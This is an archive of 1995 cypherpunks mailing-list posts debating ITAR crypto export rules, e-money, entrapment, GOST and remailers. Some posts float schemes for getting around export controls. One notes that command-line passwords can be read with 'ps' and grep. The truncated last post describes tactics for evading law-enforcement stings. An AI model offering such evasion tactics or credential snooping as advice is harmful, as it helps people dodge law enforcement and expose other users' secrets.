> that some people have expressed.  Yes, it is a pain when their are
> cross-posts that are completely off-topic but, as Adam correctly points out,
> some are interesting and relevant.
>
	<attila>  but is not the charter of the list "cypherpunks write 
    code" an issue. I don't go as far as Perry on irrelevancy (and Perry 
    breaks his own commandment at will --as do I).

>     One of the tenets proposed by those on this list is free speech.  Most
> of us are on more than one list, so I'm assuming that most of us receive
> 100+ messages a day.  It is irritating to read something that's been crossed
> to c|punks that has nothing to do with this list.  However, it only takes a
> few seconds to arrive at that conclusion and trash the post.

	<attila> that may be true, but it is annoying enough that I use
    'procmail' to waste the lists (and Dr. Fred) before they even make the
    message list.  AND, 'procmail' separates all the mailing list into
    separate folders on the way in --I have not read a newsgroup for
   almost a year unless I am looking for something very specific. 

>     The "they are targeting this list" borders almost on paranoia.  While
> some paranoia is healthy :) - it should not lead to the cry to ban posts
> that have been *deemed* to be inappropriate.
>
	<attila>  any one with a political agenda is going to cross post 
    any list which, in their opinion, might be an audience. the ACLU
    post today is obvious --freedom of speech and congressional action to
    effectively shut down the internet, which certainly falls within our 
    mainstream "interests."

>     I find it interesting that those who express that the net should be a
> community where expression is to be encouraged and defended - until the time
> arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
> knocks on one's front door.
> 
	<attila> this is a valid concern. the last figure I saw for lists 
    was 12,000+.  if some of them do not overlap, where did they find
    12,000 topics worthy of a mail list? as I said, procmail takes care of
    the yeoman's portion, but it is not the be all to end all either. I'm
    not at the point of writing an ai based preprocessor which analyzes
    the content of the folders before invoking my mail reader, but how far
    off is that? information may be key to survival, but...

> Regards -
>   Lynne
> 
	<attila> comment to Lynne: that is the key to life as we know it!

> 
> *******************************************************
> Lynne L. Harrison, Esq.   |     "The key to life:
> Poughkeepsie, New York    |      - Get up;
> E-mail:                   |      - Survive;
> lharrison at mhv.net         |      - Go to bed."
> *******************************************************
> 





From gnu at toad.com  Thu Nov 23 12:41:21 1995
From: gnu at toad.com (John Gilmore)
Date: Fri, 24 Nov 1995 04:41:21 +0800
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <9511232021.AA20165@toad.com>


Date: Mon, 13 Nov 1995 17:35:39 -0500
From: Dave Farber <farber at central.cis.upenn.edu>
Subject: IP: cybercash! Holy Mackeral, Andy!
To: interesting-people at eff.org (interesting-people mailing list)

>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]

"Sir, Prof Alec Chrystal ... argues that because cash is unimportant, its
replacement by smart cards will have little impact. However, cash is
virtually the only kind of money issued by government (in the UK, more than
99 per cent). If a government cannot issue cash because e-money facilitates
the use of another country's currency  for domestic transactions, it will
lose virtually all its seignorage. The government will have to issue some
=A323 billion extra gilts and then pay about =A32 billion every year in=
 extra
interest.

"Moreover, cash circulates much more quickly than bank deposits (it has a
high velocity-adjusted weight). Cash was used for almost 15 billion retail
transactions in the UK in 1993, versus 4 billion for all other methods. So
the currency in which retail transactions is priced is in practice
determined by the denomination of cash. E-money would threaten this
dominance, allowing people to stop using domestic currency completely
(other than for paying taxes).

"The importance of e-money replacing cash is greater than possible effects
on exchange rates. Rather, it might make certain currencies to all intents
and purposes disappear."

Giles Keating
head of global economics
CS First Boston
London, UK





From froomkin at law.miami.edu  Thu Nov 23 12:50:40 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Fri, 24 Nov 1995 04:50:40 +0800
Subject: Spam the Sign!
In-Reply-To: <199511230002.QAA01527@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>



Actually, the application of the law tends to be far more reasonable than 
non-lawyers believe.  This is one of the hardest things to get law 
students to believe.  But it is a human process, not a mechancial one.

If you sell a product legally in the US, taking reasonable precautions to
observe the ITAR and making clear to your customers what their obligations
are, you have essentially zero risk.  How do I know this?  Many, many,
many people do exactly that every day, and none have AFAIK even been
threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
make only exportable products so that they don't have the trouble of 
supporting two different versions, doing 2 kinds of paperwork, etc.

OTOH, if you hand software to someone to put on an FTP site, nudge, 
nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
really are guilty of trying to end-run the ITAR, and they feds may give 
you a hard time, which after all is their job if you are breaking federal 
law.

None of this of course goes to the question of whether the ITAR is 
good/bad or un/constitutional.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From mark at unicorn.com  Thu Nov 23 12:52:39 1995
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 24 Nov 1995 04:52:39 +0800
Subject: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <Pine.3.89.9511232006.A11987-0100000@unicorn.com>


On Thu, 23 Nov 1995, Perry E. Metzger wrote:

> Source Code
>           DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
							   ^^
Is that the real A5, or the version that was posted to Usenet some time 
ago ?

	Mark






From froomkin at law.miami.edu  Thu Nov 23 12:57:14 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Fri, 24 Nov 1995 04:57:14 +0800
Subject: Disclaimers [WAS Re: Java & Netscape security [NOISE]]
In-Reply-To: <Pa01eD16w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951123153601.26616D-100000@viper.law.miami.edu>


I don't want to ruin a nice thanksgiving by starting a flameware.  So let
me just say that whether a post from a Tron.com address by a person saying
"I don't speak for tron corporation" would be held to be a valid
disclaimer is complicated, fact-driven, and (unless there is a state
statute that speaks to the question) a question of what it was reasonable
for an average reasonable recipient to think under the circumstances. 
Anyone who says "precedent says X" on this subject is oversimplifying. 
For one thing there are 50 states.  They may not all have the same answer
for given facts.... 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From khijol!erc at uunet.uu.net  Thu Nov 23 14:12:43 1995
From: khijol!erc at uunet.uu.net (Ed Carp [khijol SysAdmin])
Date: Fri, 24 Nov 1995 06:12:43 +0800
Subject: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232149.PAA21305@khijol>


-----BEGIN PGP SIGNED MESSAGE-----

> >A law
> >enforcement team would be stepping onto shaky ground if they were forced to
> >transfer illegal images/etc to a suspected trafficer before getting evidence
> >from him. Entrapment is an ugly concept.
> 
> We've been hearing about such things (using the mails) for some time.  I
> don't know how the cops avoided entrapment when they posed as kiddie porn
> customers or pedophiles when they were doing the AOL sting.

As I recall, the courts have sent the message to the LE community that it's entrapment if they 
entice someone into doing something that they normally wouldn't do.  If you're a kiddie porn dealer, 
and I as a LE officer entice you to sell me some pictures of that cute 8-year-old doing some geezer, 
then that's not entrapment.  If I, on the other hand, try to pressure you (assuming you are a 
law-abiding citizen) into buying such by either misrepresenting the article in question or by 
threatening you with dire consequences if you don't buy, etc. - in other words, forcing or enticing 
you to do something you normally wouldn't do - *that's* entrapment.
- --
Ed Carp, N7EKG    			Ed.Carp at linux.org, ecarp at netcom.com
					214/993-3935	voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTsaSS9AwzY9LDxAQHZ9AP/ZmGmWQm/cd+osceg0rLj8ZgrPbsXw3hi
5u4RbAjWlazTKydk6JfgDrpfLn+tFr/KhqWE7Zo7wFcgTJcX39PdhuxyO0gnt+lr
BdCjB+qYSei3/TgsoU5XPkMEj+fp22dT1NIxRdDPujDjE1BEz18knQsihngGsZ6X
Iz8TyBe6SIM=
=dJ0W
-----END PGP SIGNATURE-----





From khijol!erc at cygnus.com  Thu Nov 23 14:13:43 1995
From: khijol!erc at cygnus.com (Ed Carp [khijol SysAdmin])
Date: Fri, 24 Nov 1995 06:13:43 +0800
Subject: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232157.PAA21597@khijol>


-----BEGIN PGP SIGNED MESSAGE-----

> Strong authentication via crypto does not create a trusted group.  Trust is
> a human:human decision -- subject to severe flaws, none of which are solved
> by crypto.  [Can you devise a crypto protocol which will prevent or even
> just detect adultery, for example?]  With each additional person, there is
> a probability of deception.  For this informal network of yours, deception
> by any one participant constitutes a security failure.  If you want to
> avoid that, therefore, you need to keep the group *very small*.  If it's
> that small, then it's not that interesting a target for LE.

Very true.  Authentication, whether strong or weak, merely says that you are who you say you are -
totally different from this "web of trust" I keep hearing about - and that is *it*.  Do you trust me
any more now than before I started signing my postings? 

> Ah -- but that's the point I was making.  Crypto gives the appearance of
> security -- whether it's in the informal network or with file storage.
> It's often a bank vault door on a cardboard house.  For much of what people
> do, especially if there's a large net, it's not rational to expect to
> achieve security.  But -- if people have done something to achieve
> security, they're likely to be fooled into trusting it to be adequate.
> 
> Meanwhile, if *everything* on the perp's machine is encrypted, you're
> probably in good shape.  That means he'll be required to type passwords too
> often -- so he'll either pick a small one or have some machinery which
> stores the password.  Both give cryptanalytic advantages.

It's well-known that most revelations of encrypted information come from "humint", not from 
mathematical finesse with the encryption scheme.  I especially love Oracle's idea of security - when 
submitting SQL to the Oracle back-end, to automate the process, you feed it your user ID and 
password IN THE CLEAR, ON THE COMMAND LINE.  Any weenie can run "ps -ef/ps -ax" and pipe it to 
grep.  The fact that Larry Ellison wont do anything about it seems to me to be idiocy of the first 
order, and that Oracle doesn't know what it's doing.  It's not even a good database product.  Deity 
only knows why people keep buying it, although that's rather off-topic ;)
- --
Ed Carp, N7EKG    			Ed.Carp at linux.org, ecarp at netcom.com
					214/993-3935	voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTuOyS9AwzY9LDxAQEuWAP9EU0LgHHAFQgpR+h2D/u9oZmNR3I2z7Cm
qsEZr0Iy84Cu7fH5vIvy5waDx3OZC+Gc1Z2kFydebxl09rTrY88rYIj0Ezp3Mqjk
25oqSlKoDMJNYC2W6cfhVAx6VBDnuExMi4H/R/8pTUepNSBMyc9z0nG0ivkCbTBz
AQd1jcI3lPU=
=Fvaf
-----END PGP SIGNATURE-----





From dl at hplyot.obspm.fr  Thu Nov 23 14:34:21 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 24 Nov 1995 06:34:21 +0800
Subject: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <9511232218.AA19027@hplyot.obspm.fr>


Corey Bridges writes:
 > And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
 > scrolling for the last 3 hours.
Where the spam was coming from ?

Btw, the web,... application is *great* it is always nice to (appear)
to interact with the real world ! ('cept that when I tried, the only
thing the camera showed was indeed "Strong Crypto" or "Now", it
would'nt let pass one of my messages)
It is a very easy target for abuses though...
Very nice job, keep up !

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

bomb domestic disruption Soviet Kennedy Peking Uzi plutonium





From dl at hplyot.obspm.fr  Thu Nov 23 14:52:24 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 24 Nov 1995 06:52:24 +0800
Subject: Export control FTP servers
In-Reply-To: <Pine.BSD.3.91.951121085819.4906B-100000@usr3.primenet.com>
Message-ID: <9511232220.AA19031@hplyot.obspm.fr>


sameer at c2.org writes:
[ 'passwd'/'secret' is NEWDIRNAME : ]
 > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
[...]
Hey hey, cool, what a great security ! now can you please send source
for /usr/local/bin/pseudo-random ? :-)))

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PGP Clinton ammunition Greenpeace Croatian Kennedy genetic





From jsimmons at goblin.punk.net  Thu Nov 23 15:46:10 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Fri, 24 Nov 1995 07:46:10 +0800
Subject: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>
Message-ID: <199511232322.PAA00782@goblin.punk.net>


> 
> Actually, the application of the law tends to be far more reasonable than 
> non-lawyers believe.  This is one of the hardest things to get law 
> students to believe.  But it is a human process, not a mechancial one.
> 
> If you sell a product legally in the US, taking reasonable precautions to
> observe the ITAR and making clear to your customers what their obligations
> are, you have essentially zero risk.  How do I know this?  Many, many,
> many people do exactly that every day, and none have AFAIK even been
> threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
> intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
> make only exportable products so that they don't have the trouble of 
> supporting two different versions, doing 2 kinds of paperwork, etc.
> 
> OTOH, if you hand software to someone to put on an FTP site, nudge, 
> nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
> really are guilty of trying to end-run the ITAR, and they feds may give 
> you a hard time, which after all is their job if you are breaking federal 
> law.
> 
Then suppose you hand software to MIT to put on its export-controlled ftp
site (which would seem to follow your requirements to take reasonable
precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
wink, wink - BUT you know that it's going to be available on major ftp
sites in Europe within a few hours anyway.  The intent to export isn't 
there, but the export occurs anyway.  Is it the intent, or the knowledge
that's important?

Obviously the intent, or the MIT server would be in jail.

So I demonstrate lack of intent to export, by following MIT's model when I
set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
a note from the NSA or somebody to do this?  And if I do need somebody or
something's 'permission', and they refuse to give it, aren't they using
ITAR to restrict the distribution domestically?  Do I have any options in
this case other than to give up?

Or, to bring it down to a practical question, what's stopping Netscape?  How
does Netscape setting up an 'export controlled' ftp site based on the MIT
version lead to one of their executives going to jail?

I have the feeling that we're talking about two different things here - the
law as it's practiced in the courtroom and the law as it's practiced on the
'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
won't help much if the government decides to do a Phil Zimmerman on me.
But I would be interested in your comments.

-- 
Jeff Simmons                           jsimmons at goblin.punk.net





From rsalz at osf.org  Thu Nov 23 16:20:44 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 24 Nov 1995 08:20:44 +0800
Subject: Spam the Sign!
Message-ID: <9511240003.AA05004@sulphur.osf.org>


>  Or do I need
>a note from the NSA or somebody to do this?

Somebody at DoD, department of trade control.  I posted the address and
phone number of the guy here a couple of days ago -- check the archives.
Cool soon, he's leaving early December; expect him to be replaced by
someone clueless.
	/r$





From EALLENSMITH at ocelot.Rutgers.EDU  Thu Nov 23 17:13:57 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 24 Nov 1995 09:13:57 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <01HXZTB0E3XG8WYILG@mbcl.rutgers.edu>


From:	IN%"sameer at c2.org"  "sameer" 16-NOV-1995 19:01:20.75

>From EALLENSMITH:
> 	I will as soon as someone comes up with a _fully_ private digital
> cash system and starts using it for something. As I understand it, Chaum's
> ecash system is not one (i.e., non-privacy to the sender and of amounts to the
> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
> immediately (if there's a text-based interface).

	ecash provides full payor anonymity. Payee anonymity is
currently not possible, but that is being worked on. 
----------------
	That's what I said; "non-privacy to the sender" is lack of payee
anonymnity. This lack is problematic for me personally in two respects:
	First, there is that, as I have stated, I would like to be a payee at
some point. My likelihood of doing so is decreased if I do not have an
anonymnity option.
	Second, services that I might like to utilize are less likely to be
available if the anonymnity of the provider is not guaranteed.
	-Allen





From jimbell at pacifier.com  Thu Nov 23 18:35:43 1995
From: jimbell at pacifier.com (jim bell)
Date: Fri, 24 Nov 1995 10:35:43 +0800
Subject: Spam the Sign!
Message-ID: <m0tInGT-0008xjC@pacifier.com>


 Jeff Simmons <jsimmons at goblin.punk.net> said...

>Then suppose you hand software to MIT to put on its export-controlled ftp
>site (which would seem to follow your requirements to take reasonable
>precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
>wink, wink - BUT you know that it's going to be available on major ftp
>sites in Europe within a few hours anyway.  The intent to export isn't 
>there, but the export occurs anyway.  Is it the intent, or the knowledge
>that's important?
>
>Obviously the intent, or the MIT server would be in jail.
>
>So I demonstrate lack of intent to export, by following MIT's model when I
>set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
>a note from the NSA or somebody to do this?  And if I do need somebody or
>something's 'permission', and they refuse to give it, aren't they using
>ITAR to restrict the distribution domestically?  Do I have any options in
>this case other than to give up?
>
>Or, to bring it down to a practical question, what's stopping Netscape?  How
>does Netscape setting up an 'export controlled' ftp site based on the MIT
>version lead to one of their executives going to jail?
>
>I have the feeling that we're talking about two different things here - the
>law as it's practiced in the courtroom and the law as it's practiced on the
>'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
>won't help much if the government decides to do a Phil Zimmerman on me.
>But I would be interested in your comments.


I very much agree with the direction you appear to be headed in.  It seems
to me that Netscape should have no problem devising some sort of scenario in
which such a program eventually gets onto the nets, but in a way that is
squeaky clean, at least for THEM.  


In addition, why should they even need to write the encrytion part of their
software IN the US?  It occurs to me that one way to do this might be to
send one of their programmers to a conveniently-located place, such as
Vancouver BC , Montreal Canada, or a few other nearby places, with a great
deal of fanfare, and tell him to "write some crypto."  He does, and brings
it back into the US with him, leaving a copy of it "outside" the country for
international distribution.






From fc at all.net  Thu Nov 23 19:00:41 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 24 Nov 1995 11:00:41 +0800
Subject: Spam the Sign!
In-Reply-To: <m0tInGT-0008xjC@pacifier.com>
Message-ID: <9511240239.AA15636@all.net>


>  Jeff Simmons <jsimmons at goblin.punk.net> said...
> 
> >Then suppose you hand software to MIT to put on its export-controlled ftp
> >site (which would seem to follow your requirements to take reasonable
> >precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
> >wink, wink - BUT you know that it's going to be available on major ftp
> >sites in Europe within a few hours anyway.  The intent to export isn't 
> >there, but the export occurs anyway.  Is it the intent, or the knowledge
> >that's important?

What's important to the government is that the crypto not be exported.  If
Netscape did this, the government might try to take them to court to make
an example of them, or might leave them alone to support the information
superhighway, or might refuse to ever buy any Netscape, or whatever.  The
point for Netscape is than none of these are good for the corporation.

> >Or, to bring it down to a practical question, what's stopping Netscape?  How
> >does Netscape setting up an 'export controlled' ftp site based on the MIT
> >version lead to one of their executives going to jail?

Maybe their executives don't want to deal with the possibility of going to
jail and are staying far from the edge of the law.  Maybe they are too busy
trying to find some way to make money.

> I very much agree with the direction you appear to be headed in.  It seems
> to me that Netscape should have no problem devising some sort of scenario in
> which such a program eventually gets onto the nets, but in a way that is
> squeaky clean, at least for THEM.  

But why would they want to risk this? As squeeky clean as it is, we now
all know that they know that making it available this way is exporting
it.  It's also possible that one of the people who took part in it would
turn State's evidence, or that this would result in a loss of
shareholder confidence, or that the people running Netscape support the
government position, or even that they just don't want the controversey.

> In addition, why should they even need to write the encrytion part of their
> software IN the US?  It occurs to me that one way to do this might be to
> send one of their programmers to a conveniently-located place, such as
> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> it back into the US with him, leaving a copy of it "outside" the country for
> international distribution.

This is illegal as well.  The programmer is exporting the cryptosystem,
and may even be guilty of treason (probably not).  If you really want
strong crypto, just buy it fom one of the hundreds of legitimate
overseas suppliers.  If you want to export strong crypto Netscape,
rewrite Netscape outside the US.  It's not that complex a program.

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From asgaard at sos.sll.se  Thu Nov 23 19:16:11 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 24 Nov 1995 11:16:11 +0800
Subject: The Mesh and the Net
In-Reply-To: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
Message-ID: <Pine.HPP.3.91.951124032121.19699A-100000@cor.sos.sll.se>


On Wed, 22 Nov 1995, John Young wrote:

> "The Mesh and the Net: Speculations on Armed Conflict in a
> Time of Free Silicon," by Martin C. Libicki, March, 1994. 
> (233kb)
> 
> Available on the Web at:
> 
> <http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>
> 
> NDU is the National Defense University, Libicki's teat.

A very interesting read! The speculations about the future of the
(civilian) Net are amazing, even more so coming from an official
sub-division of the US DoD (?). An excerpt (that could have been
written by a cypherpunk crypto-anarchist philosopher just as well):

   'The information revolution, acting through
 multinational corporations and transnational
 communities, may weaken many powers of the state
 anyway.  Would it be much of an exaggeration to posit
 a nation's expression, not through government, but as
 a local ganglion of the world Net.  That being the
 case, might not the decline of the state coincide with
 the rise of the Net, the newest venue for crime,
 conflict, and chaos?'

Mats





From asgaard at sos.sll.se  Thu Nov 23 19:30:11 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Fri, 24 Nov 1995 11:30:11 +0800
Subject: GOST for sale
Message-ID: <Pine.HPP.3.91.951124033807.19699B-100000@cor.sos.sll.se>



According to a short article in a Swedish newspaper (DN)
with the title 'Spy Code of KGB can make computers safe', 
JETICO INC., located in Finland (Tammerfors), introduced
a new crypto system on the world market last week. It's 
based on GOST, the Russian federal standard algorithm.
This product, called BestCrypt, is implemented at least
partly in hardware. Alledgedly it uses 'GOST 28147-89',
whatever that stands for.

GOST is probably very secure - a huge keyspace (256 bits) and
KGB would not have left a trapdoor for NSA to take advantage
of, would they?

The newspaper article ends:

'The Finnish entrepreneurs asseverate that their
Russian colleagues have never had anything to do
with the KGB.'

Mats








From markm at omni.voicenet.com  Thu Nov 23 20:26:07 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Fri, 24 Nov 1995 12:26:07 +0800
Subject: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <Pine.LNX.3.91.951123230420.466B-100000@localhost>


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 23 Nov 1995, Laurent Demailly wrote:

> sameer at c2.org writes:
> [ 'passwd'/'secret' is NEWDIRNAME : ]
>  > NEWDIRNAME=`/usr/local/bin/pseudo-random | /usr/local/bin/md5sum`
> [...]
> Hey hey, cool, what a great security ! now can you please send source
> for /usr/local/bin/pseudo-random ? :-)))
> 
I just used the following simple shell script.  Not very secure but does
the trick for the purposes of export controlled directories.

#!/bin/sh
(date; uptime; ps -e; netstat; set) | md5sum
 
- --

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLVFB7Zc+sv5siulAQFH8gQAia001FgQfLTK7B97vB7KMH/eAb2RWG/a
MjO3x8Mp1FkHnyI5/hKvvxP2MEn8O69XPMIqKqn/dcflok807qJ9mnNh0MciHTMm
H5qStR3S36zFQyxLjrOcLN/9EzudsRIWndIX+/FFyBV7cNCSfUqHTYJGuqVzXbvC
IheIJzuxCu4=
=tXU6
-----END PGP SIGNATURE-----


`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/





From cme at clark.net  Thu Nov 23 21:28:39 1995
From: cme at clark.net (Carl Ellison)
Date: Fri, 24 Nov 1995 13:28:39 +0800
Subject: establishing trust
Message-ID: <199511240500.AAA07836@clark.net>


>From khijol!erc at uunet.uu.net Thu Nov 23 16:21 EST 1995
>From: "Ed Carp [khijol SysAdmin]" <khijol!erc at uunet.uu.net>

..so..why the UUCP style address?

>Subject: Re: crypto for porno users
>To: khijol!clark.net!cme at uunet.uu.net (Carl Ellison)
>Date: Thu, 23 Nov 1995 15:57:17 -0600 (CST)
>Cc: khijol!got.net!edge at uunet.uu.net, khijol!toad.com!cypherpunks at uunet.uu.net
>

>totally different from this "web of trust" I keep hearing about - and that is
>*it*.  Do you trust me any more now than before I started signing my postings?

Actually, in my view, signed postings are the first step.  With those (and
the right S/W (not there yet)), I get to know that a bunch of postings came
from the same person.  I even know who they came from:  the person who
is capable of signing with key 0xXXXXXXXX.

Since the only way I have of getting to know the person is through those
postings, I get to know that person and through that knowledge I decide
whether or not to trust.

And, yes, I can be fooled.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme at acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+





From merriman at arn.net  Thu Nov 23 23:42:49 1995
From: merriman at arn.net (David K. Merriman)
Date: Fri, 24 Nov 1995 15:42:49 +0800
Subject: bit quiet in here lately
Message-ID: <199511240728.BAA11266@arnet.arn.net>


At 02:11 AM 11/24/95 -0500, futplex wrote:
>sameer writes:
>> 	I am working on a spec which myself and others will turn into
>> an internet draft, for placements on the standards track.  It will
>> standardize remailer commands and nymserver commands, and will
>> incorporate payment. Once we get a draft written up it will be posted
>> for review, flames, and criticism.
>
>Great -- I've been toying with working on exactly that since the summer. 
>I never quite convinced myself that a) the general net community would really 
>take a remailer-related i-draft or RFC seriously, or even that b) the
>remailer community would really find a standards document useful. It's
>encouraging to see that some other people also think it's worth writing.
>

Now, if the remailer service-listing operators could agree on a standard
format for their reporting (lag time, feature lists, etc), then it would
simplify maintaining a list of remailers - which would increase the
usability of the remailer system, and help the use and growth of remailers.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148







From aba at atlas.ex.ac.uk  Fri Nov 24 02:02:04 1995
From: aba at atlas.ex.ac.uk (aba at atlas.ex.ac.uk)
Date: Fri, 24 Nov 1995 18:02:04 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
Message-ID: <604.9511240945@exe.dcs.exeter.ac.uk>



Attila <attila at primenet.com> writes:
>    On Thu, 23 Nov 1995, jim bell wrote: 
>  
> > [US companies hiring non-US programmers to avoid ITAR]
> 
>     <attila sez>  I think they have that one covered --not only is it 
> violation of ITAR's intent to send a programmer out of the U.S., but is 
> illegal to hire a foreign national to program for your non-U.S. products.

Having your company legally based outside the US, with just a US
office (on paper) would seem to get around this.  If all your code is
shipped from Sun Corp, Russia (and actually you get CDs in the mail
from Russia literally if you order software from them), then it would
seem to avoid the problem.  They'd probably have to make sure that no
programming at all occured in the US otherwise they'd be susceptible
to the claim that they were violating ITAR by their US development
team exporting software with a hole for crypto to their main
development team in Russia.

Multinationals could juggle that much easily.

The other problem is that multi-nationals don't like stepping on the
govts toes, because the govt might retaliate by not buying Sun, or Sun
mysteriously losing contracts.  Sound right?

>     the test is going to be with someone like Sun who "bought" a group of 
> Russian crypto programmers and left them in Russia.  Now, the problem 
> with ITAR is that if you import that code, you can not then export the 
> code since it is now covered by ITAR.

However this is the real problem, the don't want crypto no matter
what.  They'll do their damnest to stop it by whatever means: legal or
illegal, monetary pressure, threats, FUD, overbroad ITAR, selective
enforcement, etc.

>     secondly, it appears there is a move afoot to make it an ITAR 
> violation to hire the foreign nationals to circumvent ITAR --basically, 
> the Feds want to stop cryptography _everywhere_, including telling 
> Russians they can not work for U.S. companies!  Just where do they think 
> they are getting off?
> 
>     then, when ALL hitech moves out of the U.S. and the DoD needs us, we 
> will not be here, will we?

Something that is puzzling me is how DigiCash is doing.  Their
software I think is ITAR regulated (or would be if it were shipped
from a US ftp site).  OK, so they get around it by shipping their
software from Digicash, Bv, Netherlands.

But, somewhere on their pages it mentions that: "Digicash, Bv is a
wholly owned subsidiary of Digicash" (which *is* based in the US).

Does that make them a counter example who is currently getting away
with it?  Just to complicate things further David Chaum is a US
citizen, right?  Maybe he himself is ok because he doesn't write the
code himself, the digicash development team does.  Is Digicash (US)
hiring (collectively) Digicash, Bv if it is a wholly owned subsidiary,
in US legal terms?

Reckon the long term message is for companies to just pull out of the
US.  Moving to a suitable jurisdiction would be possible for Netscape,
and would be a coool blow against ITAR.

Adam






From jamesd at echeque.com  Fri Nov 24 02:17:51 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 24 Nov 1995 18:17:51 +0800
Subject: crypto for porno users
Message-ID: <199511240423.UAA25472@blob.best.net>


At 12:17 AM 11/23/95 -0800, Jay Campbell wrote:
> A common way to get around prostitution sting operations 
> is to ask the lady to expose sensitive portions of her anatomy 
> to prove her sincerity before the would-be customer commits 
> to any transactions; this sort of thing is also becoming 
> commonplace on the net for pornography or pirated software,

